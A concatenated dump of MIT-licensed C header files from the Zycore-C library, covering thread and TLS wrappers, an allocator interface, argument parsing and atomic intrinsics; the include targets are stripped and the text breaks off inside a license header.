19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_API_THREAD_H
33 | #define ZYCORE_API_THREAD_H
34 |
35 | #include
36 | #include
37 |
38 | #ifndef ZYAN_NO_LIBC
39 |
40 | #ifdef __cplusplus
41 | extern "C" {
42 | #endif
43 |
44 | /* ============================================================================================== */
45 | /* Enums and types */
46 | /* ============================================================================================== */
47 |
48 | #if defined(ZYAN_POSIX)
49 |
50 | #include
51 |
52 | /* ---------------------------------------------------------------------------------------------- */
53 | /* General */
54 | /* ---------------------------------------------------------------------------------------------- */
55 |
56 | /**
57 | * Defines the `ZyanThread` data-type.
58 | */
59 | typedef pthread_t ZyanThread;
60 |
61 | /**
62 | * Defines the `ZyanThreadId` data-type.
63 | */
64 | typedef ZyanU64 ZyanThreadId;
65 |
66 | /* ---------------------------------------------------------------------------------------------- */
67 | /* Thread Local Storage (TLS) */
68 | /* ---------------------------------------------------------------------------------------------- */
69 |
70 | /**
71 | * Defines the `ZyanThreadTlsIndex` data-type.
72 | */
73 | typedef pthread_key_t ZyanThreadTlsIndex;
74 |
75 | /**
76 | * Defines the `ZyanThreadTlsCallback` function prototype.
77 | */
78 | typedef void(*ZyanThreadTlsCallback)(void* data);
79 |
80 | /**
81 | * Declares a Thread Local Storage (TLS) callback function.
82 | *
83 | * @param name The callback function name.
84 | * @param param_type The callback data parameter type.
85 | * @param param_name The callback data parameter name.
86 | */
87 | #define ZYAN_THREAD_DECLARE_TLS_CALLBACK(name, param_type, param_name) \
88 | void name(param_type* param_name)
89 |
90 | /* ---------------------------------------------------------------------------------------------- */
91 |
92 | #elif defined(ZYAN_WINDOWS)
93 |
94 | #include
95 |
96 | /* ---------------------------------------------------------------------------------------------- */
97 | /* General */
98 | /* ---------------------------------------------------------------------------------------------- */
99 |
100 | /**
101 | * Defines the `ZyanThread` data-type.
102 | */
103 | typedef HANDLE ZyanThread;
104 |
105 | /**
106 | * Defines the `ZyanThreadId` data-type.
107 | */
108 | typedef DWORD ZyanThreadId;
109 |
110 | /* ---------------------------------------------------------------------------------------------- */
111 | /* Thread Local Storage (TLS) */
112 | /* ---------------------------------------------------------------------------------------------- */
113 |
114 | /**
115 | * Defines the `ZyanThreadTlsIndex` data-type.
116 | */
117 | typedef DWORD ZyanThreadTlsIndex;
118 |
119 | /**
120 | * Defines the `ZyanThreadTlsCallback` function prototype.
121 | */
122 | typedef PFLS_CALLBACK_FUNCTION ZyanThreadTlsCallback;
123 |
124 | /**
125 | * Declares a Thread Local Storage (TLS) callback function.
126 | *
127 | * @param name The callback function name.
128 | * @param param_type The callback data parameter type.
129 | * @param param_name The callback data parameter name.
130 | */
131 | #define ZYAN_THREAD_DECLARE_TLS_CALLBACK(name, param_type, param_name) \
132 | VOID NTAPI name(param_type* param_name)
133 |
134 | /* ---------------------------------------------------------------------------------------------- */
135 |
136 | #else
137 | # error "Unsupported platform detected"
138 | #endif
139 |
140 | /* ============================================================================================== */
141 | /* Exported functions */
142 | /* ============================================================================================== */
143 |
144 | /* ---------------------------------------------------------------------------------------------- */
145 | /* General */
146 | /* ---------------------------------------------------------------------------------------------- */
147 |
148 | /**
149 | * Returns the handle of the current thread.
150 | *
151 | * @param thread Receives the handle of the current thread.
152 | *
153 | * @return A zyan status code.
154 | */
155 | ZYCORE_EXPORT ZyanStatus ZyanThreadGetCurrentThread(ZyanThread* thread);
156 |
157 | /**
158 | * Returns the unique id of the current thread.
159 | *
160 | * @param thread_id Receives the unique id of the current thread.
161 | *
162 | * @return A zyan status code.
163 | */
164 | ZYCORE_EXPORT ZyanStatus ZyanThreadGetCurrentThreadId(ZyanThreadId* thread_id);
165 |
166 | /* ---------------------------------------------------------------------------------------------- */
167 | /* Thread Local Storage (TLS) */
168 | /* ---------------------------------------------------------------------------------------------- */
169 |
170 | /**
171 | * Allocates a new Thread Local Storage (TLS) slot.
172 | *
173 | * @param index Receives the TLS slot index.
174 | * @param destructor A pointer to a destructor callback which is invoked to finalize the data
175 | * in the TLS slot or `ZYAN_NULL`, if not needed.
176 | *
177 | * The maximum available number of TLS slots is implementation specific and different on each
178 | * platform:
179 | * - Windows
180 | * - A total amount of 128 slots per process are guaranteed
181 | * - POSIX
182 | * - A total amount of 128 slots per process are guaranteed
183 | * - Some systems guarantee larger amounts like e.g. 1024 slots per process
184 | *
185 | * Note that the invocation rules for the destructor callback are implementation specific and
186 | * different on each platform:
187 | * - Windows
188 | * - The callback is invoked when a thread exits
189 | * - The callback is invoked when the process exits
190 | * - The callback is invoked when the TLS slot is released
191 | * - POSIX
192 | * - The callback is invoked when a thread exits and the stored value is not null
193 | * - The callback is NOT invoked when the process exits
194 | * - The callback is NOT invoked when the TLS slot is released
195 | *
196 | * @return A zyan status code.
197 | */
198 | ZYCORE_EXPORT ZyanStatus ZyanThreadTlsAlloc(ZyanThreadTlsIndex* index,
199 | ZyanThreadTlsCallback destructor);
200 |
201 | /**
202 | * Releases a Thread Local Storage (TLS) slot.
203 | *
204 | * @param index The TLS slot index.
205 | *
206 | * @return A zyan status code.
207 | */
208 | ZYCORE_EXPORT ZyanStatus ZyanThreadTlsFree(ZyanThreadTlsIndex index);
209 |
210 | /**
211 | * Returns the value inside the given Thread Local Storage (TLS) slot for the
212 | * calling thread.
213 | *
214 | * @param index The TLS slot index.
215 | * @param data Receives the value inside the given Thread Local Storage
216 | * (TLS) slot for the calling thread.
217 | *
218 | * @return A zyan status code.
219 | */
220 | ZYCORE_EXPORT ZyanStatus ZyanThreadTlsGetValue(ZyanThreadTlsIndex index, void** data);
221 |
222 | /**
223 | * Set the value of the given Thread Local Storage (TLS) slot for the calling thread.
224 | *
225 | * @param index The TLS slot index.
226 | * @param data The value to store inside the given Thread Local Storage (TLS) slot for the
227 | * calling thread
228 | *
229 | * @return A zyan status code.
230 | */
231 | ZYCORE_EXPORT ZyanStatus ZyanThreadTlsSetValue(ZyanThreadTlsIndex index, void* data);
232 |
233 | /* ---------------------------------------------------------------------------------------------- */
234 |
235 | /* ============================================================================================== */
236 |
237 | #ifdef __cplusplus
238 | }
239 | #endif
240 |
241 | #endif /* ZYAN_NO_LIBC */
242 |
243 | #endif /* ZYCORE_API_THREAD_H */
244 |
--------------------------------------------------------------------------------
/inc/Zycore/Allocator.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_ALLOCATOR_H
33 | #define ZYCORE_ALLOCATOR_H
34 |
35 | #include
36 | #include
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | /* ============================================================================================== */
43 | /* Enums and types */
44 | /* ============================================================================================== */
45 |
46 | struct ZyanAllocator_;
47 |
48 | /**
49 | * Defines the `ZyanAllocatorAllocate` function prototype.
50 | *
51 | * @param allocator A pointer to the `ZyanAllocator` instance.
52 | * @param p Receives a pointer to the first memory block sufficient to hold an
53 | * array of `n` elements with a size of `element_size`.
54 | * @param element_size The size of a single element.
55 | * @param n The number of elements to allocate storage for.
56 | *
57 | * @return A zyan status code.
58 | *
59 | * This prototype is used for the `allocate()` and `reallocate()` functions.
60 | *
61 | * The result of the `reallocate()` function is undefined, if `p` does not point to a memory block
62 | * previously obtained by `(re-)allocate()`.
63 | */
64 | typedef ZyanStatus (*ZyanAllocatorAllocate)(struct ZyanAllocator_* allocator, void** p,
65 | ZyanUSize element_size, ZyanUSize n);
66 |
67 | /**
68 | * Defines the `ZyanAllocatorDeallocate` function prototype.
69 | *
70 | * @param allocator A pointer to the `ZyanAllocator` instance.
71 | * @param p The pointer obtained from `(re-)allocate()`.
72 | * @param element_size The size of a single element.
73 | * @param n The number of elements earlier passed to `(re-)allocate()`.
74 | *
75 | * @return A zyan status code.
76 | */
77 | typedef ZyanStatus (*ZyanAllocatorDeallocate)(struct ZyanAllocator_* allocator, void* p,
78 | ZyanUSize element_size, ZyanUSize n);
79 |
80 | /**
81 | * Defines the `ZyanAllocator` struct.
82 | *
83 | * This is the base class for all custom allocator implementations.
84 | *
85 | * All fields in this struct should be considered as "private". Any changes may lead to unexpected
86 | * behavior.
87 | */
88 | typedef struct ZyanAllocator_
89 | {
90 | /**
91 | * The allocate function.
92 | */
93 | ZyanAllocatorAllocate allocate;
94 | /**
95 | * The reallocate function.
96 | */
97 | ZyanAllocatorAllocate reallocate;
98 | /**
99 | * The deallocate function.
100 | */
101 | ZyanAllocatorDeallocate deallocate;
102 | } ZyanAllocator;
103 |
104 | /* ============================================================================================== */
105 | /* Exported functions */
106 | /* ============================================================================================== */
107 |
108 | /**
109 | * Initializes the given `ZyanAllocator` instance.
110 | *
111 | * @param allocator A pointer to the `ZyanAllocator` instance.
112 | * @param allocate The allocate function.
113 | * @param reallocate The reallocate function.
114 | * @param deallocate The deallocate function.
115 | *
116 | * @return A zyan status code.
117 | */
118 | ZYCORE_EXPORT ZyanStatus ZyanAllocatorInit(ZyanAllocator* allocator, ZyanAllocatorAllocate allocate,
119 | ZyanAllocatorAllocate reallocate, ZyanAllocatorDeallocate deallocate);
120 |
121 | #ifndef ZYAN_NO_LIBC
122 |
123 | /**
124 | * Returns the default `ZyanAllocator` instance.
125 | *
126 | * @return A pointer to the default `ZyanAllocator` instance.
127 | *
128 | * The default allocator uses the default memory manager to allocate memory on the heap.
129 | *
130 | * You should in no case modify the returned allocator instance to avoid unexpected behavior.
131 | */
132 | ZYCORE_EXPORT ZYAN_REQUIRES_LIBC ZyanAllocator* ZyanAllocatorDefault(void);
133 |
134 | #endif // ZYAN_NO_LIBC
135 |
136 | /* ============================================================================================== */
137 |
138 | #ifdef __cplusplus
139 | }
140 | #endif
141 |
142 | #endif /* ZYCORE_ALLOCATOR_H */
143 |
--------------------------------------------------------------------------------
/inc/Zycore/ArgParse.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Joel Hoener
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Implements command-line argument parsing.
30 | */
31 |
32 | #ifndef ZYCORE_ARGPARSE_H
33 | #define ZYCORE_ARGPARSE_H
34 |
35 | #include
36 | #include
37 | #include
38 | #include
39 |
40 | #ifdef __cplusplus
41 | extern "C" {
42 | #endif
43 |
44 | /* ============================================================================================== */
45 | /* Structs and other types */
46 | /* ============================================================================================== */
47 |
48 | /**
49 | * Definition of a single argument.
50 | */
51 | typedef struct ZyanArgParseDefinition_
52 | {
53 | /**
54 | * The argument name, e.g. `--help`.
55 | *
56 | * Must start with either one or two dashes. Single dash arguments must consist of a single
57 | * character, (e.g. `-n`), double-dash arguments can be of arbitrary length.
58 | */
59 | const char* name;
60 | /**
61 | * Whether the argument is boolean or expects a value.
62 | */
63 | ZyanBool boolean;
64 | /**
65 | * Whether this argument is required (error if missing).
66 | */
67 | ZyanBool required;
68 | } ZyanArgParseDefinition;
69 |
70 | /**
71 | * Configuration for argument parsing.
72 | */
73 | typedef struct ZyanArgParseConfig_
74 | {
75 | /**
76 | * `argv` argument passed to `main` by LibC.
77 | */
78 | const char** argv;
79 | /**
80 | * `argc` argument passed to `main` by LibC.
81 | */
82 | ZyanUSize argc;
83 | /**
84 | * Minimum # of accepted unnamed / anonymous arguments.
85 | */
86 | ZyanUSize min_unnamed_args;
87 | /**
88 | * Maximum # of accepted unnamed / anonymous arguments.
89 | */
90 | ZyanUSize max_unnamed_args;
91 | /**
92 | * Argument definition array, or `ZYAN_NULL`.
93 | *
94 | * Expects a pointer to an array of `ZyanArgParseDefinition` instances. The array is
95 | * terminated by setting the `.name` field of the last element to `ZYAN_NULL`. If no named
96 | * arguments should be parsed, you can also set this to `ZYAN_NULL`.
97 | */
98 | ZyanArgParseDefinition* args;
99 | } ZyanArgParseConfig;
100 |
101 | /**
102 | * Information about a parsed argument.
103 | */
104 | typedef struct ZyanArgParseArg_
105 | {
106 | /**
107 | * Corresponding argument definition, or `ZYAN_NULL` for unnamed args.
108 | *
109 | * This pointer is borrowed from the `cfg` pointer passed to `ZyanArgParse`.
110 | */
111 | const ZyanArgParseDefinition* def;
112 | /**
113 | * Whether the argument has a value (is non-boolean).
114 | */
115 | ZyanBool has_value;
116 | /**
117 | * If `has_value == true`, then the argument value.
118 | *
119 | * This is a view into the `argv` string array passed to `ZyanArgParse` via the `cfg` argument.
120 | */
121 | ZyanStringView value;
122 | } ZyanArgParseArg;
123 |
124 | /* ============================================================================================== */
125 | /* Exported functions */
126 | /* ============================================================================================== */
127 |
128 | #ifndef ZYAN_NO_LIBC
129 |
130 | /**
131 | * Parse arguments according to a `ZyanArgParseConfig` definition.
132 | *
133 | * @param cfg Argument parser config to use.
134 | * @param parsed Receives the parsed output. Vector of `ZyanArgParseArg`. Ownership is
135 | * transferred to the user. Input is expected to be uninitialized. On error,
136 | * the vector remains uninitialized.
137 | * @param error_token On error, if it makes sense, receives the argument fragment causing the
138 | * error. Optional, may be `ZYAN_NULL`. The pointer borrows into the `cfg`
139 | * struct and doesn't have to be freed by the user.
140 | *
141 | * @return A `ZyanStatus` status determining whether the parsing succeeded.
142 | */
143 | ZYCORE_EXPORT ZyanStatus ZyanArgParse(const ZyanArgParseConfig *cfg, ZyanVector* parsed,
144 | const char** error_token);
145 |
146 | #endif
147 |
148 | /**
149 | * Parse arguments according to a `ZyanArgParseConfig` definition.
150 | *
151 | * This version allows specification of a custom memory allocator and thus supports no-libc.
152 | *
153 | * @param cfg Argument parser config to use.
154 | * @param parsed Receives the parsed output. Vector of `ZyanArgParseArg`. Ownership is
155 | * transferred to the user. Input is expected to be uninitialized. On error,
156 | * the vector remains uninitialized.
157 | * @param error_token On error, if it makes sense, receives the argument fragment causing the
158 | * error. Optional, may be `ZYAN_NULL`. The pointer borrows into the `cfg`
159 | * struct and doesn't have to be freed by the user.
160 | * @param allocator The `ZyanAllocator` to be used for allocating the output vector's data.
161 | *
162 | * @return A `ZyanStatus` status determining whether the parsing succeeded.
163 | */
164 | ZYCORE_EXPORT ZyanStatus ZyanArgParseEx(const ZyanArgParseConfig *cfg, ZyanVector* parsed,
165 | const char** error_token, ZyanAllocator* allocator);
166 |
167 | /* ============================================================================================== */
168 |
169 | #ifdef __cplusplus
170 | }
171 | #endif
172 |
173 | #endif /* ZYCORE_ARGPARSE_H */
174 |
--------------------------------------------------------------------------------
/inc/Zycore/Atomic.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zyan-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Cross compiler atomic intrinsics.
30 | */
31 |
32 | #ifndef ZYCORE_ATOMIC_H
33 | #define ZYCORE_ATOMIC_H
34 |
35 | #ifdef __cplusplus
36 | extern "C" {
37 | #endif
38 |
39 | #include
40 | #include
41 |
42 | /* ============================================================================================== */
43 | /* Enums and Types */
44 | /* ============================================================================================== */
45 |
46 | /*
47 | * Wraps a 32-bit value to provide atomic access.
48 | */
49 | typedef struct ZyanAtomic32_
50 | {
51 | ZyanU32 volatile value;
52 | } ZyanAtomic32;
53 |
54 | /*
55 | * Wraps a 64-bit value to provide atomic access.
56 | */
57 | typedef struct ZyanAtomic64_
58 | {
59 | ZyanU64 volatile value;
60 | } ZyanAtomic64;
61 |
62 | /*
63 | * Wraps a pointer-sized value to provide atomic access.
64 | */
65 | typedef struct ZyanAtomicPointer_
66 | {
67 | ZyanVoidPointer volatile value;
68 | } ZyanAtomicPointer;
69 |
70 | /* ============================================================================================== */
71 | /* Macros */
72 | /* ============================================================================================== */
73 |
74 | /* ---------------------------------------------------------------------------------------------- */
75 | /* Pointer sized */
76 | /* ---------------------------------------------------------------------------------------------- */
77 |
78 | /**
79 | * @copydoc ZyanAtomicCompareExchange
80 | */
81 | #define ZYAN_ATOMIC_COMPARE_EXCHANGE(destination, comparand, value) \
82 | ZyanAtomicCompareExchange((ZyanAtomicPointer*)&(destination), (comparand), (value))
83 |
84 | /**
85 | * @copydoc ZyanAtomicIncrement
86 | */
87 | #define ZYAN_ATOMIC_INCREMENT(destination) \
88 | ZyanAtomicIncrement((ZyanAtomicPointer*)&(destination));
89 |
90 | /**
91 | * @copydoc ZyanAtomicDecrement
92 | */
93 | #define ZYAN_ATOMIC_DECREMENT(destination) \
94 | ZyanAtomicDecrement((ZyanAtomicPointer*)&(destination));
95 |
96 | /* ---------------------------------------------------------------------------------------------- */
97 | /* 32-bit */
98 | /* ---------------------------------------------------------------------------------------------- */
99 |
100 | /**
101 | * @copydoc ZyanAtomicCompareExchange
102 | */
103 | #define ZYAN_ATOMIC_COMPARE_EXCHANGE32(destination, comparand, value) \
104 | ZyanAtomicCompareExchange32((ZyanAtomic32*)&(destination), (comparand), (value))
105 |
106 | /**
107 | * @copydoc ZyanAtomicIncrement
108 | */
109 | #define ZYAN_ATOMIC_INCREMENT32(destination) \
110 | ZyanAtomicIncrement32((ZyanAtomic32*)&(destination));
111 |
112 | /**
113 | * @copydoc ZyanAtomicDecrement
114 | */
115 | #define ZYAN_ATOMIC_DECREMENT32(destination) \
116 | ZyanAtomicDecrement32((ZyanAtomic32*)&(destination));
117 |
118 | /* ---------------------------------------------------------------------------------------------- */
119 | /* 64-bit */
120 | /* ---------------------------------------------------------------------------------------------- */
121 |
122 | /**
123 | * @copydoc ZyanAtomicCompareExchange
124 | */
125 | #define ZYAN_ATOMIC_COMPARE_EXCHANGE64(destination, comparand, value) \
126 | ZyanAtomicCompareExchange64((ZyanAtomic64*)&(destination), (comparand), (value))
127 |
128 | /**
129 | * @copydoc ZyanAtomicIncrement
130 | */
131 | #define ZYAN_ATOMIC_INCREMENT64(destination) \
132 | ZyanAtomicIncrement64((ZyanAtomic64*)&(destination));
133 |
134 | /**
135 | * @copydoc ZyanAtomicDecrement
136 | */
137 | #define ZYAN_ATOMIC_DECREMENT64(destination) \
138 | ZyanAtomicDecrement64((ZyanAtomic64*)&(destination));
139 |
140 | /* ---------------------------------------------------------------------------------------------- */
141 |
142 | /* ============================================================================================== */
143 | /* Functions */
144 | /* ============================================================================================== */
145 |
146 | /* ---------------------------------------------------------------------------------------------- */
147 | /* Pointer sized */
148 | /* ---------------------------------------------------------------------------------------------- */
149 |
150 | /**
151 | * Compares two values for equality and, if they are equal, replaces the first value.
152 | *
153 | * @param destination A pointer to the destination value.
154 | * @param comparand The value to compare with.
155 | * @param value The replacement value.
156 | *
157 | * @return The original value.
158 | */
159 | static ZyanUPointer ZyanAtomicCompareExchange(ZyanAtomicPointer* destination,
160 | ZyanUPointer comparand, ZyanUPointer value);
161 |
162 | /**
163 | * Increments the given value and stores the result, as an atomic operation.
164 | *
165 | * @param destination A pointer to the destination value.
166 | *
167 | * @return The incremented value.
168 | */
169 | static ZyanUPointer ZyanAtomicIncrement(ZyanAtomicPointer* destination);
170 |
171 | /**
172 | * Decrements the given value and stores the result, as an atomic operation.
173 | *
174 | * @param destination A pointer to the destination value.
175 | *
176 | * @return The decremented value.
177 | */
178 | static ZyanUPointer ZyanAtomicDecrement(ZyanAtomicPointer* destination);
179 |
180 | /* ---------------------------------------------------------------------------------------------- */
181 | /* 32-bit */
182 | /* ---------------------------------------------------------------------------------------------- */
183 |
184 | /**
185 | * @copydoc ZyanAtomicCompareExchange
186 | */
187 | static ZyanU32 ZyanAtomicCompareExchange32(ZyanAtomic32* destination,
188 | ZyanU32 comparand, ZyanU32 value);
189 |
190 | /**
191 | * @copydoc ZyanAtomicIncrement
192 | */
193 | static ZyanU32 ZyanAtomicIncrement32(ZyanAtomic32* destination);
194 |
195 | /**
196 | * @copydoc ZyanAtomicDecrement
197 | */
198 | static ZyanU32 ZyanAtomicDecrement32(ZyanAtomic32* destination);
199 |
200 | /* ---------------------------------------------------------------------------------------------- */
201 | /* 64-bit */
202 | /* ---------------------------------------------------------------------------------------------- */
203 |
204 | /**
205 | * @copydoc ZyanAtomicCompareExchange
206 | */
207 | static ZyanU64 ZyanAtomicCompareExchange64(ZyanAtomic64* destination,
208 | ZyanU64 comparand, ZyanU64 value);
209 |
210 | /**
211 | * @copydoc ZyanAtomicIncrement
212 | */
213 | static ZyanU64 ZyanAtomicIncrement64(ZyanAtomic64* destination);
214 |
215 | /**
216 | * @copydoc ZyanAtomicDecrement
217 | */
218 | static ZyanU64 ZyanAtomicDecrement64(ZyanAtomic64* destination);
219 |
220 | /* ---------------------------------------------------------------------------------------------- */
221 |
222 | /* ============================================================================================== */
223 |
224 | #if defined(ZYAN_CLANG) || defined(ZYAN_GCC) || defined(ZYAN_ICC)
225 | # include
226 | #elif defined(ZYAN_MSVC)
227 | # include
228 | #else
229 | # error "Unsupported compiler detected"
230 | #endif
231 |
232 | #ifdef __cplusplus
233 | }
234 | #endif
235 |
236 | #endif /* ZYCORE_ATOMIC_H */
237 |
--------------------------------------------------------------------------------
/inc/Zycore/Internal/AtomicGNU.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zyan-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | #ifndef ZYCORE_ATOMIC_GNU_H
28 | #define ZYCORE_ATOMIC_GNU_H
29 |
30 | #ifdef __cplusplus
31 | extern "C" {
32 | #endif
33 |
34 | #include
35 | #include
36 |
37 | /* ============================================================================================== */
38 | /* Functions */
39 | /* ============================================================================================== */
40 |
41 | #if defined(ZYAN_CLANG) || defined(ZYAN_GCC) || defined(ZYAN_ICC)
42 |
43 | /* ---------------------------------------------------------------------------------------------- */
44 | /* Pointer sized */
45 | /* ---------------------------------------------------------------------------------------------- */
46 |
47 | ZYAN_INLINE ZyanUPointer ZyanAtomicCompareExchange(ZyanAtomicPointer* destination,
48 | ZyanUPointer comparand, ZyanUPointer value)
49 | {
50 | return (ZyanUPointer)(__sync_val_compare_and_swap(
51 | &destination->value, (void*)comparand, (void*)value, &destination->value));
52 | }
53 |
54 | ZYAN_INLINE ZyanUPointer ZyanAtomicIncrement(ZyanAtomicPointer* destination)
55 | {
56 | return (ZyanUPointer)(__sync_fetch_and_add(&destination->value, (void*)1,
57 | &destination->value)) + 1;
58 | }
59 |
60 | ZYAN_INLINE ZyanUPointer ZyanAtomicDecrement(ZyanAtomicPointer* destination)
61 | {
62 | return (ZyanUPointer)(__sync_sub_and_fetch(&destination->value, (void*)1, &destination->value));
63 | }
64 |
65 | /* ---------------------------------------------------------------------------------------------- */
66 | /* 32-bit */
67 | /* ---------------------------------------------------------------------------------------------- */
68 |
69 | ZYAN_INLINE ZyanU32 ZyanAtomicCompareExchange32(ZyanAtomic32* destination,
70 | ZyanU32 comparand, ZyanU32 value)
71 | {
72 | return (ZyanU32)(__sync_val_compare_and_swap(&destination->value, comparand, value,
73 | &destination->value));
74 | }
75 |
76 | ZYAN_INLINE ZyanU32 ZyanAtomicIncrement32(ZyanAtomic32* destination)
77 | {
78 | return (ZyanU32)(__sync_fetch_and_add(&destination->value, 1, &destination->value)) + 1;
79 | }
80 |
81 | ZYAN_INLINE ZyanU32 ZyanAtomicDecrement32(ZyanAtomic32* destination)
82 | {
83 | return (ZyanU32)(__sync_sub_and_fetch(&destination->value, 1, &destination->value));
84 | }
85 |
86 | /* ---------------------------------------------------------------------------------------------- */
87 | /* 64-bit */
88 | /* ---------------------------------------------------------------------------------------------- */
89 |
90 | ZYAN_INLINE ZyanU64 ZyanAtomicCompareExchange64(ZyanAtomic64* destination,
91 | ZyanU64 comparand, ZyanU64 value)
92 | {
93 | return (ZyanU64)(__sync_val_compare_and_swap(&destination->value, comparand, value,
94 | &destination->value));
95 | }
96 |
97 | ZYAN_INLINE ZyanU64 ZyanAtomicIncrement64(ZyanAtomic64* destination)
98 | {
99 | return (ZyanU64)(__sync_fetch_and_add(&destination->value, 1, &destination->value)) + 1;
100 | }
101 |
102 | ZYAN_INLINE ZyanU64 ZyanAtomicDecrement64(ZyanAtomic64* destination)
103 | {
104 | return (ZyanU64)(__sync_sub_and_fetch(&destination->value, 1, &destination->value));
105 | }
106 |
107 | /* ---------------------------------------------------------------------------------------------- */
108 |
109 | #endif
110 |
111 | /* ============================================================================================== */
112 |
113 | #ifdef __cplusplus
114 | }
115 | #endif
116 |
117 | #endif /* ZYCORE_ATOMIC_GNU_H */
118 |
--------------------------------------------------------------------------------
/inc/Zycore/Internal/AtomicMSVC.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zyan-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
